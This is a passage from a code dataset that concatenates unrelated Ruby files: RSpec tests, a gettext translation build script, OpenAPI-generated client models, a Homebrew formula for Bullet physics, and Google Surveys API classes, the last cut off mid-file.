0361a037dd0356bdd3c72de2b7a8ba3aaf9b7b2e | 561 | require 'spec_helper'
module Finitio
describe SetType, 'initialize' do
subject{
SetType.new(intType)
}
context 'with valid arguments' do
it{ should be_a(SetType) }
it 'should set the instance variables' do
expect(subject.elm_type).to eq(intType)
end
end
context 'with invalid arguments' do
subject{ SetType.new("foo") }
it 'should raise an error' do
expect{
subject
}.to raise_error(ArgumentError, 'Finitio::Type expected, got `foo`')
end
end
end
end
| 19.344828 | 76 | 0.616756 |
91ed2d1b733d19e45891049b012d1e9a63d7a561 | 4,351 | #!/usr/bin/ruby
# Copyright (c) 2015-2016 SUSE LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
require 'rubygems'
require 'nokogiri'
require 'json'
require 'gettext'
require 'tmpdir'
require 'fileutils'
include GetText
pot = <<-END
msgid ""
msgstr ""
"Project-Id-Version: PACKAGE VERSION\\n"
"Report-Msgid-Bugs-To: \\n"
"POT-Creation-Date: #{Time.now}\\n"
"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\\n"
"Last-Translator: FULL NAME <EMAIL@ADDRESS>\\n"
"Language-Team: LANGUAGE <[email protected]>\\n"
"MIME-Version: 1.0\\n"
"Content-Type: text/plain; charset=UTF-8\\n"
"Content-Transfer-Encoding: 8bit\\n"
END
cfg = JSON.load(open('po/config.json', 'r'))
package_name = cfg['name']
pot_file = "po/#{package_name}.pot"
pot_file_stamp = File.stat(pot_file).mtime
newest_stamp = pot_file_stamp
strings = Hash.new
listed_langs = Hash.new
cfg['pages'].each do |page|
f = open(page, 'r')
if f.stat.mtime > newest_stamp
newest_stamp = f.stat.mtime
end
page = Nokogiri::HTML(f)
page.xpath('//*[@lang="en"]').each do |t|
next if t.name == 'html'
text = t.text
if text.empty?
text = t.attribute('placeholder').to_s
text = t.attribute('value').to_s if text.empty?
next if text.empty?
end
strings[text] ||= []
strings[text].push(t.line)
if t.name == 'a' && !t.attribute('href').to_s.empty?
href = t.attribute('href').to_s
strings[href] ||= []
strings[href].push(t.line)
end
end
page.xpath('//*[@class="change-language"]').each do |t|
lang=t.attribute('data-language-value').value
listed_langs[lang] = t.text
end
end
if pot_file_stamp < newest_stamp
puts("updating #{pot_file}")
strings.each_pair do |text, lines|
pot += "#: "
pot += lines.map { |l| "index.html:#{l}"}.join(' ')
pot += "\n"
pot += "msgid \"#{text}\"\n"
pot += "msgstr \"\"\n"
pot += "\n"
end
f = IO.popen("msgcat -F - -o #{pot_file}", "w").puts(pot)
pot_file_stamp = File.stat(pot_file).mtime
end
Dir.mktmpdir do |localedir|
Dir.glob("po/*.po").sort.each do |po|
language = %r(po/([^.]+).po).match(po)[1]
target_file = "assets/js/langpack/#{language}.json"
system("msgmerge -q -U #{po} #{pot_file}")
if File.exists?(target_file) && File.stat(po).mtime < File.stat(target_file).mtime
next
end
domain = "#{language}_landing"
mofile="#{localedir}/#{language}/LC_MESSAGES/#{domain}.mo"
GetText.locale = language
FileUtils.mkpath("#{localedir}/#{language}/LC_MESSAGES")
system("msgfmt -o #{mofile} #{po}")
GetText.bindtextdomain(domain, path: localedir)
GetText.textdomain(domain)
translations={}
strings.keys.sort.each do |string|
next if string.empty?
translation = gettext(string)
translations[string] = gettext(string) if string != translation
end
if translations.count < 5
puts("#{language} has only #{translations.count} translations, skipping")
next
end
if not listed_langs.has_key?(language)
puts("missing #{language} in index.html, don't forget assets/js/opensuse-theme.js")
end
puts("updating #{target_file} ...")
hash = {}
hash['WARNING'] = 'Please see the README.md - this is generated'
hash['token'] = translations
open(target_file, "w") do |f|
f.write(JSON.pretty_generate(hash))
end
end
end
| 31.759124 | 89 | 0.67134 |
d5aecd6f7baba8ae3b1fe4ffe0131dd90d69da8f | 6,701 | =begin
#ORY Oathkeeper
#ORY Oathkeeper is a reverse proxy that checks the HTTP Authorization for validity against a set of rules. This service uses Hydra to validate access tokens and policies.
The version of the OpenAPI document: v0.0.0-alpha.62
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 5.2.1
=end
require 'date'
require 'time'
module OryOathkeeperClient
# The standard error format
class IsInstanceAliveInternalServerError
attr_accessor :payload
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'payload' => :'Payload'
}
end
# Returns all the JSON keys this model knows about
def self.acceptable_attributes
attribute_map.values
end
# Attribute type mapping.
def self.openapi_types
{
:'payload' => :'IsInstanceAliveInternalServerErrorBody'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `OryOathkeeperClient::IsInstanceAliveInternalServerError` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `OryOathkeeperClient::IsInstanceAliveInternalServerError`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'payload')
self.payload = attributes[:'payload']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
payload == o.payload
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[payload].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
elsif type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :Time
Time.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
# models (e.g. Pet) or oneOf
klass = OryOathkeeperClient.const_get(type)
klass.respond_to?(:openapi_one_of) ? klass.build(value) : klass.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 30.459091 | 233 | 0.635129 |
f81ab106cd5844dc4e21f09fb92e76342e8e26a6 | 3,158 | class Bullet < Formula
desc "Physics SDK"
homepage "https://bulletphysics.org/"
url "https://github.com/bulletphysics/bullet3/archive/3.17.tar.gz"
sha256 "baa642c906576d4d98d041d0acb80d85dd6eff6e3c16a009b1abf1ccd2bc0a61"
license "Zlib"
head "https://github.com/bulletphysics/bullet3.git", branch: "master"
bottle do
rebuild 1
sha256 cellar: :any, arm64_monterey: "9ebae8edbbf4df12b7190daa7ef11f32651a478dd5ac3e07c81c2d4378bdf554"
sha256 cellar: :any, arm64_big_sur: "1f2000191b311d231c5e1a949aba892992e533df61cb3cf05cd1ec7ded01cb3f"
sha256 cellar: :any, monterey: "2ccc0eff9a5116600282123ebaa2d3adaed572103a4c372467577b4aa5e02671"
sha256 cellar: :any, big_sur: "85bf74ad7500b0bc9b15f212cc45d1d3ad6e2a2e427a1878ac571e7fd7007d97"
sha256 cellar: :any, catalina: "76e1c4ed888700e335545275f080f954071d76164784881488b0b31f295bdbb3"
sha256 cellar: :any, mojave: "3b39c389a9b532dfdbc0f3652bf9530fc68e1d453d1df5e017028b41f448e6c6"
sha256 cellar: :any_skip_relocation, x86_64_linux: "c2887fa28d8a3e81b07eff60948ee01179438333e826e1692799d6253e3fcc27"
end
depends_on "cmake" => :build
depends_on "pkg-config" => :build
depends_on "[email protected]" => :build
def install
common_args = %w[
-DBT_USE_EGL=ON
-DBUILD_UNIT_TESTS=OFF
-DINSTALL_EXTRA_LIBS=ON
]
double_args = std_cmake_args + %W[
-DCMAKE_INSTALL_RPATH=#{opt_lib}/bullet/double
-DUSE_DOUBLE_PRECISION=ON
-DBUILD_SHARED_LIBS=ON
]
mkdir "builddbl" do
system "cmake", "..", *double_args, *common_args
system "make", "install"
end
dbllibs = lib.children
(lib/"bullet/double").install dbllibs
args = std_cmake_args + %W[
-DBUILD_PYBULLET_NUMPY=ON
-DCMAKE_INSTALL_RPATH=#{opt_lib}
]
mkdir "build" do
system "cmake", "..", *args, *common_args, "-DBUILD_SHARED_LIBS=OFF", "-DBUILD_PYBULLET=OFF"
system "make", "install"
system "make", "clean"
system "cmake", "..", *args, *common_args, "-DBUILD_SHARED_LIBS=ON", "-DBUILD_PYBULLET=ON"
system "make", "install"
end
# Install single-precision library symlinks into `lib/"bullet/single"` for consistency
lib.each_child do |f|
next if f == lib/"bullet"
(lib/"bullet/single").install_symlink f
end
end
test do
(testpath/"test.cpp").write <<~EOS
#include "LinearMath/btPolarDecomposition.h"
int main() {
btMatrix3x3 I = btMatrix3x3::getIdentity();
btMatrix3x3 u, h;
polarDecompose(I, u, h);
return 0;
}
EOS
cxx_lib = "-lc++"
on_linux do
cxx_lib = "-lstdc++"
end
# Test single-precision library
system ENV.cc, "test.cpp", "-I#{include}/bullet", "-L#{lib}",
"-lLinearMath", cxx_lib, "-o", "test"
system "./test"
# Test double-precision library
system ENV.cc, "test.cpp", "-I#{include}/bullet", "-L#{lib}/bullet/double",
"-lLinearMath", cxx_lib, "-o", "test"
system "./test"
end
end
| 33.595745 | 123 | 0.651995 |
e2b75503ac2882db1449d0b9f096da58b8b550f4 | 208 | # frozen_string_literal: true
class UrlPolicy < ApplicationPolicy
def index?
true
end
def edit?
user.associate_access?
end
def update?
edit?
end
def destroy?
edit?
end
end
| 10.4 | 35 | 0.658654 |
f8dff1d544c45baa3d1839871302a136b5f41fed | 925 | require_relative 'spec_helper'
describe 'Mongoid::EncryptedString integration' do
let(:string) { 'foo' }
describe 'create document without any attributes' do
subject { Document.create }
it 'sets encrypted string to nil' do
subject.string.must_be_nil
end
describe "when default is set to 'foo' }" do
subject { DocumentWithImplicitDefault.create }
it 'sets encrypted string to foo' do
subject.string.must_equal string
end
end
describe "when default is set to ->{ EncryptedString.new('foo') }" do
subject { DocumentWithExplicitDefault.create }
it 'sets encrypted string to foo' do
subject.string.must_equal string
end
end
end
describe 'create document with attribute' do
subject { Document.create(string: string) }
it 'sets encrypted string to foo' do
subject.string.must_equal string
end
end
end
| 20.108696 | 73 | 0.677838 |
7ad15675f7f576f102d6e982f55ec87b5bcabf5b | 409 | module Far
class Options < Hash
attr_accessor :options
def self.far_options
[:replace, :no_replace, :please, :no_please]
end
def initialize(options={})
options.each do |k, v|
self[k.to_sym] = Option.new k, v
end
end
def to_command_line
self.reject do |k, v|
v.far_option?
end.values.map(&:to_command_line).join(" ")
end
end
end
| 18.590909 | 50 | 0.596577 |
03286764a59a475f459ee3a907725fff9aa83b37 | 27,107 | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'date'
require 'google/apis/core/base_service'
require 'google/apis/core/json_representation'
require 'google/apis/core/hashable'
require 'google/apis/errors'
module Google
module Apis
module SurveysV2
#
class FieldMask
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `fields`
# @return [Array<Google::Apis::SurveysV2::FieldMask>]
attr_accessor :fields
#
# Corresponds to the JSON property `id`
# @return [Fixnum]
attr_accessor :id
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@fields = args[:fields] if args.key?(:fields)
@id = args[:id] if args.key?(:id)
end
end
#
class PageInfo
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `resultPerPage`
# @return [Fixnum]
attr_accessor :result_per_page
#
# Corresponds to the JSON property `startIndex`
# @return [Fixnum]
attr_accessor :start_index
#
# Corresponds to the JSON property `totalResults`
# @return [Fixnum]
attr_accessor :total_results
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@result_per_page = args[:result_per_page] if args.key?(:result_per_page)
@start_index = args[:start_index] if args.key?(:start_index)
@total_results = args[:total_results] if args.key?(:total_results)
end
end
#
class ResultsGetRequest
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `resultMask`
# @return [Google::Apis::SurveysV2::ResultsMask]
attr_accessor :result_mask
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@result_mask = args[:result_mask] if args.key?(:result_mask)
end
end
#
class ResultsMask
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `fields`
# @return [Array<Google::Apis::SurveysV2::FieldMask>]
attr_accessor :fields
#
# Corresponds to the JSON property `projection`
# @return [String]
attr_accessor :projection
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@fields = args[:fields] if args.key?(:fields)
@projection = args[:projection] if args.key?(:projection)
end
end
# Representation of an individual survey object.
class Survey
include Google::Apis::Core::Hashable
# Specifications for the target audience of a survey run through the API.
# Corresponds to the JSON property `audience`
# @return [Google::Apis::SurveysV2::SurveyAudience]
attr_accessor :audience
# Message defining the cost to run a given survey through API.
# Corresponds to the JSON property `cost`
# @return [Google::Apis::SurveysV2::SurveyCost]
attr_accessor :cost
# Additional information to store on behalf of the API consumer and associate
# with this question. This binary blob is treated as opaque. This field is
# limited to 64K bytes.
# Corresponds to the JSON property `customerData`
# NOTE: Values are automatically base64 encoded/decoded in the client library.
# @return [String]
attr_accessor :customer_data
# Text description of the survey.
# Corresponds to the JSON property `description`
# @return [String]
attr_accessor :description
# List of email addresses for survey owners. Must contain at least the address
# of the user making the API call.
# Corresponds to the JSON property `owners`
# @return [Array<String>]
attr_accessor :owners
# List of questions defining the survey.
# Corresponds to the JSON property `questions`
# @return [Array<Google::Apis::SurveysV2::SurveyQuestion>]
attr_accessor :questions
# Message representing why the survey was rejected from review, if it was.
# Corresponds to the JSON property `rejectionReason`
# @return [Google::Apis::SurveysV2::SurveyRejection]
attr_accessor :rejection_reason
# State that the survey is in.
# Corresponds to the JSON property `state`
# @return [String]
attr_accessor :state
# Unique survey ID, that is viewable in the URL of the Survey Creator UI
# Corresponds to the JSON property `surveyUrlId`
# @return [String]
attr_accessor :survey_url_id
# Optional name that will be given to the survey.
# Corresponds to the JSON property `title`
# @return [String]
attr_accessor :title
# Number of responses desired for the survey.
# Corresponds to the JSON property `wantedResponseCount`
# @return [Fixnum]
attr_accessor :wanted_response_count
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@audience = args[:audience] if args.key?(:audience)
@cost = args[:cost] if args.key?(:cost)
@customer_data = args[:customer_data] if args.key?(:customer_data)
@description = args[:description] if args.key?(:description)
@owners = args[:owners] if args.key?(:owners)
@questions = args[:questions] if args.key?(:questions)
@rejection_reason = args[:rejection_reason] if args.key?(:rejection_reason)
@state = args[:state] if args.key?(:state)
@survey_url_id = args[:survey_url_id] if args.key?(:survey_url_id)
@title = args[:title] if args.key?(:title)
@wanted_response_count = args[:wanted_response_count] if args.key?(:wanted_response_count)
end
end
# Specifications for the target audience of a survey run through the API.
class SurveyAudience
include Google::Apis::Core::Hashable
# Optional list of age buckets to target. Supported age buckets are: ['18-24', '
# 25-34', '35-44', '45-54', '55-64', '65+']
# Corresponds to the JSON property `ages`
# @return [Array<String>]
attr_accessor :ages
# Required country code that surveys should be targeted to. Accepts standard ISO
# 3166-1 2 character language codes. For instance, 'US' for the United States,
# and 'GB' for the United Kingdom.
# Corresponds to the JSON property `country`
# @return [String]
attr_accessor :country
# Country subdivision (states/provinces/etc) that surveys should be targeted to.
# For all countries except GB, ISO-3166-2 subdivision code is required (eg. 'US-
# OH' for Ohio, United States). For GB, NUTS 1 statistical region codes for the
# United Kingdom is required (eg. 'UK-UKC' for North East England).
# Corresponds to the JSON property `countrySubdivision`
# @return [String]
attr_accessor :country_subdivision
# Optional gender to target.
# Corresponds to the JSON property `gender`
# @return [String]
attr_accessor :gender
# Language code that surveys should be targeted to. For instance, 'en-US'.
# Surveys may target bilingual users by specifying a list of language codes (for
# example, 'de' and 'en-US'). In that case, all languages will be used for
# targeting users but the survey content (which is displayed) must match the
# first language listed. Accepts standard BCP47 language codes. See
# specification.
# Corresponds to the JSON property `languages`
# @return [Array<String>]
attr_accessor :languages
# Online population source where the respondents are sampled from.
# Corresponds to the JSON property `populationSource`
# @return [String]
attr_accessor :population_source
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@ages = args[:ages] if args.key?(:ages)
@country = args[:country] if args.key?(:country)
@country_subdivision = args[:country_subdivision] if args.key?(:country_subdivision)
@gender = args[:gender] if args.key?(:gender)
@languages = args[:languages] if args.key?(:languages)
@population_source = args[:population_source] if args.key?(:population_source)
end
end
# Message defining the cost to run a given survey through API.
class SurveyCost
include Google::Apis::Core::Hashable
# Cost per survey response in nano units of the given currency. To get the total
# cost for a survey, multiply this value by wanted_response_count.
# Corresponds to the JSON property `costPerResponseNanos`
# @return [Fixnum]
attr_accessor :cost_per_response_nanos
# Currency code that the cost is given in.
# Corresponds to the JSON property `currencyCode`
# @return [String]
attr_accessor :currency_code
# *Deprecated* Threshold to start a survey automatically if the quoted price is
# at most this value. When a survey has a Screener (threshold) question, it must
# go through an incidence pricing test to determine the final cost per response.
# Typically you will have to make a followup call to start the survey giving the
# final computed cost per response. If the survey has no threshold_answers,
# setting this property will return an error. By specifying this property, you
# indicate the max price per response you are willing to pay in advance of the
# incidence test. If the price turns out to be lower than the specified value,
# the survey will begin immediately and you will be charged at the rate
# determined by the incidence pricing test. If the price turns out to be greater
# than the specified value the survey will not be started and you will instead
# be notified what price was determined by the incidence test. At that point,
# you must raise the value of this property to be greater than or equal to that
# cost before attempting to start the survey again. This will immediately start
# the survey as long the incidence test was run within the last 21 days. This
# will no longer be available after June 2018.
# Corresponds to the JSON property `maxCostPerResponseNanos`
# @return [Fixnum]
attr_accessor :max_cost_per_response_nanos
# Cost of survey in nano units of the given currency. DEPRECATED in favor of
# cost_per_response_nanos
# Corresponds to the JSON property `nanos`
# @return [Fixnum]
attr_accessor :nanos
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@cost_per_response_nanos = args[:cost_per_response_nanos] if args.key?(:cost_per_response_nanos)
@currency_code = args[:currency_code] if args.key?(:currency_code)
@max_cost_per_response_nanos = args[:max_cost_per_response_nanos] if args.key?(:max_cost_per_response_nanos)
@nanos = args[:nanos] if args.key?(:nanos)
end
end
# Message defining the question specifications.
class SurveyQuestion
include Google::Apis::Core::Hashable
# The randomization option for multiple choice and multi-select questions. If
# not specified, this option defaults to randomize.
# Corresponds to the JSON property `answerOrder`
# @return [String]
attr_accessor :answer_order
# Required list of answer options for a question.
# Corresponds to the JSON property `answers`
# @return [Array<String>]
attr_accessor :answers
# Option to allow open-ended text box for Single Answer and Multiple Answer
# question types. This can be used with SINGLE_ANSWER, SINGLE_ANSWER_WITH_IMAGE,
# MULTIPLE_ANSWERS, and MULTIPLE_ANSWERS_WITH_IMAGE question types.
# Corresponds to the JSON property `hasOther`
# @return [Boolean]
attr_accessor :has_other
alias_method :has_other?, :has_other
# For rating questions, the text for the higher end of the scale, such as 'Best'.
# For numeric questions, a string representing a floating-point that is the
# maximum allowed number for a response.
# Corresponds to the JSON property `highValueLabel`
# @return [String]
attr_accessor :high_value_label
#
# Corresponds to the JSON property `images`
# @return [Array<Google::Apis::SurveysV2::SurveyQuestionImage>]
attr_accessor :images
# Currently only support pinning an answer option to the last position.
# Corresponds to the JSON property `lastAnswerPositionPinned`
# @return [Boolean]
attr_accessor :last_answer_position_pinned
alias_method :last_answer_position_pinned?, :last_answer_position_pinned
# For rating questions, the text for the lower end of the scale, such as 'Worst'.
# For numeric questions, a string representing a floating-point that is the
# minimum allowed number for a response.
# Corresponds to the JSON property `lowValueLabel`
# @return [String]
attr_accessor :low_value_label
# Option to force the user to pick one of the open text suggestions. This
# requires that suggestions are provided for this question.
# Corresponds to the JSON property `mustPickSuggestion`
# @return [Boolean]
attr_accessor :must_pick_suggestion
alias_method :must_pick_suggestion?, :must_pick_suggestion
# Number of stars to use for ratings questions.
# Corresponds to the JSON property `numStars`
# @return [String]
attr_accessor :num_stars
# Placeholder text for an open text question.
# Corresponds to the JSON property `openTextPlaceholder`
# @return [String]
attr_accessor :open_text_placeholder
# A list of suggested answers for open text question auto-complete. This is only
# valid if single_line_response is true.
# Corresponds to the JSON property `openTextSuggestions`
# @return [Array<String>]
attr_accessor :open_text_suggestions
# Required question text shown to the respondent.
# Corresponds to the JSON property `question`
# @return [String]
attr_accessor :question
# Used by the Rating Scale with Text question type. This text goes along with
# the question field that is presented to the respondent, and is the actual text
# that the respondent is asked to rate.
# Corresponds to the JSON property `sentimentText`
# @return [String]
attr_accessor :sentiment_text
# Option to allow multiple line open text responses instead of a single line
# response. Note that we don't show auto-complete suggestions with multiple line
# responses.
# Corresponds to the JSON property `singleLineResponse`
# @return [Boolean]
attr_accessor :single_line_response
alias_method :single_line_response?, :single_line_response
# The threshold/screener answer options, which will screen a user into the rest
# of the survey. These will be a subset of the answer option strings.
# Corresponds to the JSON property `thresholdAnswers`
# @return [Array<String>]
attr_accessor :threshold_answers
# Required field defining the question type. For details about configuring
# different type of questions, consult the question configuration guide.
# Corresponds to the JSON property `type`
# @return [String]
attr_accessor :type
# Optional unit of measurement for display (for example: hours, people, miles).
# Corresponds to the JSON property `unitOfMeasurementLabel`
# @return [String]
attr_accessor :unit_of_measurement_label
# The YouTube video ID to be show in video questions.
# Corresponds to the JSON property `videoId`
# @return [String]
attr_accessor :video_id
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@answer_order = args[:answer_order] if args.key?(:answer_order)
@answers = args[:answers] if args.key?(:answers)
@has_other = args[:has_other] if args.key?(:has_other)
@high_value_label = args[:high_value_label] if args.key?(:high_value_label)
@images = args[:images] if args.key?(:images)
@last_answer_position_pinned = args[:last_answer_position_pinned] if args.key?(:last_answer_position_pinned)
@low_value_label = args[:low_value_label] if args.key?(:low_value_label)
@must_pick_suggestion = args[:must_pick_suggestion] if args.key?(:must_pick_suggestion)
@num_stars = args[:num_stars] if args.key?(:num_stars)
@open_text_placeholder = args[:open_text_placeholder] if args.key?(:open_text_placeholder)
@open_text_suggestions = args[:open_text_suggestions] if args.key?(:open_text_suggestions)
@question = args[:question] if args.key?(:question)
@sentiment_text = args[:sentiment_text] if args.key?(:sentiment_text)
@single_line_response = args[:single_line_response] if args.key?(:single_line_response)
@threshold_answers = args[:threshold_answers] if args.key?(:threshold_answers)
@type = args[:type] if args.key?(:type)
@unit_of_measurement_label = args[:unit_of_measurement_label] if args.key?(:unit_of_measurement_label)
@video_id = args[:video_id] if args.key?(:video_id)
end
end
# Container object for image data and alt_text.
class SurveyQuestionImage
include Google::Apis::Core::Hashable
# The alt text property used in image tags is required for all images.
# Corresponds to the JSON property `altText`
# @return [String]
attr_accessor :alt_text
# Inline jpeg, gif, tiff, bmp, or png image raw bytes for an image question
# types.
# Corresponds to the JSON property `data`
# NOTE: Values are automatically base64 encoded/decoded in the client library.
# @return [String]
attr_accessor :data
# The read-only URL for the hosted images.
# Corresponds to the JSON property `url`
# @return [String]
attr_accessor :url
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@alt_text = args[:alt_text] if args.key?(:alt_text)
@data = args[:data] if args.key?(:data)
@url = args[:url] if args.key?(:url)
end
end
# Message representing why the survey was rejected from review, if it was.
class SurveyRejection
include Google::Apis::Core::Hashable
# A human-readable explanation of what was wrong with the survey.
# Corresponds to the JSON property `explanation`
# @return [String]
attr_accessor :explanation
# Which category of rejection this was. See the Google Surveys Help Center for
# additional details on each category.
# Corresponds to the JSON property `type`
# @return [String]
attr_accessor :type
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@explanation = args[:explanation] if args.key?(:explanation)
@type = args[:type] if args.key?(:type)
end
end
# Reference to the current results for a given survey.
class SurveyResults
include Google::Apis::Core::Hashable
# Human readable string describing the status of the request.
# Corresponds to the JSON property `status`
# @return [String]
attr_accessor :status
# External survey ID as viewable by survey owners in the editor view.
# Corresponds to the JSON property `surveyUrlId`
# @return [String]
attr_accessor :survey_url_id
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@status = args[:status] if args.key?(:status)
@survey_url_id = args[:survey_url_id] if args.key?(:survey_url_id)
end
end
#
class SurveysDeleteResponse
include Google::Apis::Core::Hashable
# Unique request ID used for logging and debugging. Please include in any error
# reporting or troubleshooting requests.
# Corresponds to the JSON property `requestId`
# @return [String]
attr_accessor :request_id
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@request_id = args[:request_id] if args.key?(:request_id)
end
end
#
class SurveysListResponse
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `pageInfo`
# @return [Google::Apis::SurveysV2::PageInfo]
attr_accessor :page_info
# Unique request ID used for logging and debugging. Please include in any error
# reporting or troubleshooting requests.
# Corresponds to the JSON property `requestId`
# @return [String]
attr_accessor :request_id
# An individual survey resource.
# Corresponds to the JSON property `resources`
# @return [Array<Google::Apis::SurveysV2::Survey>]
attr_accessor :resources
#
# Corresponds to the JSON property `tokenPagination`
# @return [Google::Apis::SurveysV2::TokenPagination]
attr_accessor :token_pagination
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@page_info = args[:page_info] if args.key?(:page_info)
@request_id = args[:request_id] if args.key?(:request_id)
@resources = args[:resources] if args.key?(:resources)
@token_pagination = args[:token_pagination] if args.key?(:token_pagination)
end
end
#
class SurveysStartRequest
include Google::Apis::Core::Hashable
# *Deprecated* Threshold to start a survey automatically if the quoted prices is
# less than or equal to this value. See Survey.Cost for more details. This will
# no longer be available after June 2018.
# Corresponds to the JSON property `maxCostPerResponseNanos`
# @return [Fixnum]
attr_accessor :max_cost_per_response_nanos
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@max_cost_per_response_nanos = args[:max_cost_per_response_nanos] if args.key?(:max_cost_per_response_nanos)
end
end
#
class SurveysStartResponse
include Google::Apis::Core::Hashable
# Unique request ID used for logging and debugging. Please include in any error
# reporting or troubleshooting requests.
# Corresponds to the JSON property `requestId`
# @return [String]
attr_accessor :request_id
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@request_id = args[:request_id] if args.key?(:request_id)
end
end
#
class SurveysStopResponse
include Google::Apis::Core::Hashable
# Unique request ID used for logging and debugging. Please include in any error
